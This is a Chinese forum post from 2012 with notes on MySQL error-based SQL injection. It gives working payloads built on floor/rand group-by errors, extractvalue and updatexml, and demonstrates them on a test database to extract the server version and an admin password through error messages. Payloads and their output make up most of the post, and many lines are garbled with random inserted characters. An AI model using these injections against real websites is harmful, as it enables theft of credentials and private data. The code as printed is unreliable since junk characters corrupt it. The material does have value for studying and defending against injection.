放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。2 ^/ a N, W; F& l
实际测试环境:
) P8 K3 l0 v7 U& H9 ~# z
4 r! I0 F" C+ L
' d# Z4 I9 _- e* [* }( |mysql> show tables;5 `- w6 f% g4 l# ^. h
+----------------+, W* t* D9 g9 P: T, D* I: |: v
| Tables_in_test |2 }' m! ?! z7 `+ E
+----------------+9 b3 Z/ m' O) c! J( W
| admin |; _% X0 O3 m$ W+ f* n
| article |
5 l4 o3 C! \% R" k; W2 q3 [+----------------+3 ?& h- [' k* r: f2 Y0 {4 [
; b5 B6 o0 q9 l, R
5 b8 W$ @% u5 z% O* S 1 h) g% I- m' D* E) P7 j
mysql> describe admin;8 l0 L0 o+ t. q: a# w% ~# M
+-------+------------------+------+-----+---------+----------------+. h6 v) ~# |; A) _
| Field | Type | Null | Key | Default | Extra |
7 H! c8 `$ W0 b* v! j+-------+------------------+------+-----+---------+----------------+
; T! |! T) C# P$ L, p" w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
& D' i5 g! v8 Y7 }' g D# e0 D| user | varchar(50) | NO | | NULL | |
& p2 x" g& r- ]$ B| pass | varchar(50) | NO | | NULL | |
4 g5 s2 G6 G. R+-------+------------------+------+-----+---------+----------------+
# e5 d( |9 u! V5 @- D
! ~. ?+ t B4 s
8 N4 o0 U, j+ R' f3 C( G' @8 f! X
" D5 C: b: l' }( z0 g6 ~; d' Kmysql> describe article;
) I: s) B9 V" I% f- x+---------+------------------+------+-----+---------+----------------+
* K' p. l9 g M" J [| Field | Type | Null | Key | Default | Extra |
1 Y' z$ `+ f; q, z3 z9 S1 t+---------+------------------+------+-----+---------+----------------+
; T& K% P2 Q+ _! @3 F) x| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 x) N, g* \9 |4 D# X' d
| title | varchar(50) | NO | | NULL | |5 Q' D1 E2 ?8 @- O3 B
| content | varchar(50) | NO | | NULL | |
$ H0 Y8 i$ v% c! ]6 p$ s+---------+------------------+------+-----+---------+----------------+
1 Z0 X4 z2 ^4 u' M& [6 ~5 [- S1、通过floor报错: U2 j3 ^3 _; [' j3 Q- c0 u
可以通过如下一些利用代码
2 y0 v* X L% y
3 M! {7 Z G# u/ s
F' v6 c' u6 H+ Uand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
7 |' u, w6 _5 e: t. G& kfrom information_schema.tables group by x)a);" K0 o$ R9 }6 O4 P
8 s. O$ P0 n$ w' v( k- Y# v
# ], W9 J8 J- U/ V: z; N* n& w0 x4 Sand (select count(*) from (select 1 union select null union select !1)x
, G& ?! R0 [- x _) F8 x3 Egroup by concat((select table_name from information_schema.tables limit 1),
u7 i: L) f# i6 d: xfloor(rand(0)*2)));
0 l! R) O8 M0 i& d0 u4 q2 U举例如下:% e3 f# L: G( h( H' W
首先进行正常查询:& ]& r# F. U; A: x6 `3 ]
8 t6 j# r( v( rmysql> select * from article where id = 1;
2 k7 U9 y, M( y: O+----+-------+---------+
* ]3 j! ]* q/ `& r% g2 w1 t| id | title | content |; @2 V3 f! ^0 i
+----+-------+---------+- g( ~, w& x, F
| 1 | test | do it |
- U6 b$ E; H; A9 l0 I+----+-------+---------+) [* l0 _1 |9 v$ l0 n
假如id输入存在注入的话,可以通过如下语句进行报错。
1 f* K Z3 b# K% M$ F' k ' y% L+ n5 ^; H( R9 x) o) E
+ z- M- [$ U0 D; z- I( \mysql> select * from article where id = 1 and (select 1 from
7 b# `, z) O/ {9 S(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);4 u7 j I0 ~% i" o& `+ u
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
2 Z- G6 J$ X! R' |7 q可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
, d; K) L% z! }0 l例如我们需要查询管理员用户名和密码:8 T* I# x$ W5 [$ i
Method1:
: ?4 l1 z( x( }- J; l5 Y + M" U2 d* U* @, [* F) B
/ _5 A4 u2 a/ Omysql> select * from article where id = 1 and (select 1 from L3 H, `% e `& l- a5 F. R
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
D/ K/ x5 J9 _2 |4 A7 \ jfrom information_schema.tables group by x)a);
( K, I8 Q! C% m6 m) H4 Q: [ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'0 Y, `& U. y# P) n" |# I
Method2:
8 q8 H5 d; S- } D2 S. i
6 `, F4 d' G' g9 b & w8 T/ O) S) Z& d' D: S! D7 z/ ?6 }
mysql> select * from article where id = 1 and (select count(*). t- F& `$ Y+ _3 M) q M: R
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),4 |9 e) l% \0 z) r R2 F
floor(rand(0)*2)));6 {+ f! H. u7 s7 X/ O
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'" f; D# G9 |! ?5 P7 E
2、ExtractValue
9 D5 J2 s6 M4 `, n测试语句如下
/ `; V t* `3 b$ Z1 O5 c+ z . e4 \% H: @! j' N; \8 p
4 [% [8 Q H( _. f A, L! Z; sand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# g: J7 H* C% u& q
实际测试过程
3 a0 |( }5 l+ }& ~/ A& A/ W1 T) {* _ ; Y) n0 z% b F& \" |' W, F: e
* W& I8 f: _ n8 a* b! T+ e: Wmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
: q2 u8 h% h5 R# ](select pass from admin limit 1)));-- f5 t7 F2 X; ~: Y ?0 G' `
ERROR 1105 (HY000): XPATH syntax error: '\admin888'& K1 Z* D# G. G. m7 s# {# Z4 R
3、UpdateXml2 Q; A( E( F* T% D. @, y! h8 }
测试语句) y; Y& h9 u! A! y; j9 p; O9 R
( c3 L3 i1 _! g; h" s
8 h7 `# E9 a4 Y( H% _; Mand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
1 i' v9 K* m6 J7 O8 `" I1 B实际测试过程
+ s) G- @" Y2 a" e+ ]
0 }5 m* U$ U1 x0 q; Y; Z! r
) w) W( P, a0 D/ Mmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,( p3 N9 x, u3 D3 i. V( F& l
(select pass from admin limit 1),0x5e24),1));
! l4 o; g% A1 l* u+ i0 b7 cERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
4 g5 ^* n9 }1 S/ T1 S9 M* T6 \All, thanks foreign guys.
' [. H" Z4 l: L
* _: e& v3 T2 _5 j
' s2 x8 Y4 Y" H* i |
发表于 2012-12-10 10:28:51
收藏
支持
反对